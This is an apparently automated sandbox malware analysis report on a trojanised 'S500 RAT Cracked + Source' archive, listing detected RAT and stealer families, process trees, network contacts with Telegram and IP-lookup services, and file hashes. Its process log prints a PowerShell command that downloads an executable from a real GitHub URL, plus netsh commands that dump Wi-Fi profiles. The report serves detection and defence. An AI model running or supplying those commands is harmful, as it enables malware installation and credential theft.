Malware Analysis Report

2024-10-10 10:10

Sample ID 240330-q7frbsge84
Target S500 RAT Cracked + Source .rar
SHA256 54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Tags
agilenet rat default upx identifier asyncrat stormkitty arrowrat agenttesla spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff

Threat Level: Known bad

The file S500 RAT Cracked + Source .rar was found to be: Known bad.

Malicious Activity Summary

agilenet rat default upx identifier asyncrat stormkitty arrowrat agenttesla spyware stealer

Async RAT payload

Arrowrat family

Agenttesla family

StormKitty payload

AgentTesla payload

Stormkitty family

AsyncRat

Asyncrat family

StormKitty

Blocklisted process makes network request

Reads user/profile data of web browsers

Obfuscated with Agile.Net obfuscator

UPX packed file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up geolocation information via web service

Drops desktop.ini file(s)

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-30 13:55

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Arrowrat family

arrowrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:46

Platform

win7-20240221-en

Max time kernel

1561s

Max time network

1573s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2804 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:18

Platform

win10-20240221-en

Max time kernel

164s

Max time network

169s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A icanhazip.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 36 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1156 wrote to memory of 3736 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4604 wrote to memory of 4784 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 4784 wrote to memory of 5084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4784 wrote to memory of 3768 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 4148 wrote to memory of 3084 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3084 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3084 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4148 wrote to memory of 2848 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2848 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4784 wrote to memory of 364 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\taskhostw.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 217.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.184.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.mylnikov.org udp
US 104.21.44.66:443 api.mylnikov.org tcp
US 8.8.8.8:53 241.184.16.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 66.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp

Files

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 87ca06f69c513f4fbbf67c5b4e366210
SHA1 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa
SHA256 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5
SHA512 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb

memory/3608-460-0x0000000000860000-0x0000000000988000-memory.dmp

memory/3608-462-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/3608-463-0x000000001B6F0000-0x000000001B700000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

MD5 604f8eb4afe0d9a9e3fb5f7981c09145
SHA1 92d44f43b4c9fc84b99ba34c5abb3672725ecc69
SHA256 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d
SHA512 cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598

memory/4148-466-0x0000000000890000-0x00000000008C2000-memory.dmp

memory/4148-467-0x0000000073270000-0x000000007395E000-memory.dmp

memory/4148-468-0x0000000005200000-0x0000000005210000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

memory/4604-471-0x0000000000400000-0x0000000000439000-memory.dmp

memory/3608-474-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 aa2fc72b58059e5e7e9e7003ab466322
SHA1 e171576589134431baccb40d308e7dcbc776e087
SHA256 f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA512 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

memory/3768-478-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/3768-479-0x0000026137C60000-0x0000026138D24000-memory.dmp

memory/3768-480-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-482-0x00000261535E0000-0x00000261537D2000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

MD5 0f07705bd42d86d77dab085c42775244
SHA1 7e4b5c367183f4753a8d610e353c458c3def3888
SHA256 cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

MD5 9c43f77cb7cff27cb47ed67babe3eda5
SHA1 b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256 f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512 cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

memory/3768-490-0x00007FF9B6F10000-0x00007FF9B703C000-memory.dmp

memory/3768-491-0x00007FF9B6EB0000-0x00007FF9B6ED7000-memory.dmp

memory/3768-493-0x0000026153C20000-0x0000026153E60000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

MD5 af527b22b92a23c38a492c5961cf2643
SHA1 15106adfa13415287b3e9d8deba21df53cb92eda
SHA256 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

memory/4148-494-0x0000000005380000-0x00000000053E6000-memory.dmp

memory/3768-495-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4604-496-0x0000000000400000-0x0000000000439000-memory.dmp

memory/3768-497-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-498-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/3768-499-0x0000026153BE0000-0x0000026153C12000-memory.dmp

memory/3768-500-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4148-501-0x0000000073270000-0x000000007395E000-memory.dmp

memory/3768-502-0x000002613AB40000-0x000002613AB50000-memory.dmp

memory/4148-503-0x0000000005200000-0x0000000005210000-memory.dmp

memory/3768-504-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm

MD5 e03eaf459f028cc6fa8669e277c1a17a
SHA1 ea0a775e49e279208962a9179c974969a2cf7e5e
SHA256 a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f
SHA512 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm

MD5 be38b0526e6d40f44c7b62d8db2c9553
SHA1 5c4c70ae1381b5e51a685f96700340832229c06d
SHA256 f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f
SHA512 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac


Analysis: behavioral3

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:46

Platform

win10v2004-20240226-en

Max time kernel

425s

Max time network

1153s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4652 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4652 wrote to memory of 896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:46

Platform

win11-20240221-en

Max time kernel

452s

Max time network

1174s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 3712 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2332 wrote to memory of 3712 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp

Files

N/A